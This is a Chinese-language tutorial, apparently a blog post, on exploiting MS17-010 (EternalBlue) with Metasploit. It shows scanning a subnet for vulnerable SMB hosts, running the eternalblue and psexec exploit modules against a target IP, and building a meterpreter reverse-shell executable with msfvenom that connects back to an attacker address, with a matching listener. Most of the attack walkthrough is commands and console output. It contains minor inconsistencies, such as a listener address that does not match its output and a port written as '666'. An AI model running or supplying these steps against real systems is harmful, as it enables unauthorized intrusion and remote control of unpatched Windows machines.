Metasploit正題
搜索相關的漏洞插件
msf > search 17-010
搜索到了4個相關的插件:
- auxiliary/admin/smb/ms17_010_command
- auxiliary/scanner/smb/smb_ms17_010
- exploit/windows/smb/ms17_010_eternalblue
- exploit/windows/smb/ms17_010_psexec
其中前2個插件是auxiliary
目錄下的,屬於輔助驗證程序。
3和4是exploit
目錄下的,這纔是我們重點研究的對象~
使用輔助驗證插件測試
這裏就拿auxiliary/scanner/smb/smb_ms17_010
這個掃描插件來測試,這個插件的作用是掃描可能含有ms17-010漏洞的服務器。
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true yes Check for architecture on vulnerable hosts
CHECK_DOPU true yes Check for DOUBLEPULSAR on vulnerable hosts
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
這裏的show options
是顯示這個插件相關的一些參數,在Required
這一欄下面是yes
的表示必填參數,這裏面還剩RHOSTS
這個參數沒有填寫即目標網段。下面設置一個目標網段,準備進行掃描測試:
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.55.1/24
RHOSTS => 10.10.55.1/24
設置掃描線程,插件默認是1
,這裏設置爲50
:
msf auxiliary(scanner/smb/smb_ms17_010) > set THREADS 50
THREADS => 50
可以執行show options
查看自己剛剛填寫的參數信息:
開始執行插件:
msf auxiliary(scanner/smb/smb_ms17_010) > run
或者
msf auxiliary(scanner/smb/smb_ms17_010) > exploit
可以看到掃描出很多含有漏洞的主機了:
使用exploit模塊來進行攻擊測試
exploit/windows/smb/ms17_010_eternalblue
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > run
exploit成功~~
exploit/windows/smb/ms17_010_psexec
msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set RHOST 10.10.55.174
RHOST => 10.10.55.174
msf exploit(windows/smb/ms17_010_psexec) > run
失敗~~
msf exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.101.177.185:4444
[*] 10.10.55.174:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.10.55.174:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.
黑客組織 Shadow Brokers 公佈了美國國家安全局 NSA 的內部黑客工具和漏洞利用代碼,包括三大工具 EternalChampion、EternalRomance 和 EternalSynergy,近日一位安全研究人員 Sean Dillon(RiskSense) 改良了這三大黑客工具的源代碼,使其適用於 Windows 2000 之後 20 年間的所有微軟操作系統,包括 32 位和 64 位版本。
這裏我隨便測試了沒有成功,可能是這裏我測試的win7版本有點不一樣,和官方介紹的所有版本略微有點不一樣~~不過在測試Server 08 R2
版本的時候執行效率很高,可以很快拿到反彈的shell。所以具體改良了哪些建議實際動手去測試一番。
msf簡單反彈shell模板
kali操作機器的ip地址是:10.101.177.185
,將shell會話轉到kali的6666
端口上。
生成payload
payload生成有32位和64位,所以生成的時候得明確目標系統的位數,否則運行或者拿到會話的時候回GG,服務器那邊彈出停止響應的運行框。
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.101.177.185 LPORT=6666 -f exe > shell.exe
然後把生成的shell.exe拷貝到Windows下面,準備運行~
32位payload的生成語句就是
windows/meterpreter/reverse_tcp
去掉x64
監聽shell會話
msf > use exploit/multi/handler
msf > set LHOST 10.0.0.103
msf > set LPORT 6666
msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit
[*] Started reverse TCP handler on 10.101.177.185:6666
然後msf就開始監聽本機的666的端口了。
運行shell.exe
這個時候在windows下點擊之前生成的shell.exe
,msf這裏會劫持到會話。
32位系統,這裏做如下調整:
set PAYLOAD windows/meterpreter/reverse_tcp
去掉x64
meterpreter漢字亂碼問題
成因
Linux下面漢字默認是UTF-8編碼
Windows下漢字使用的是GBK系列編碼
解決方案
Kali下先勾選GBK
編碼
然後將終端臨時設置爲GBK系列編碼即可。
效果對比
msf亂碼
msf漢字正常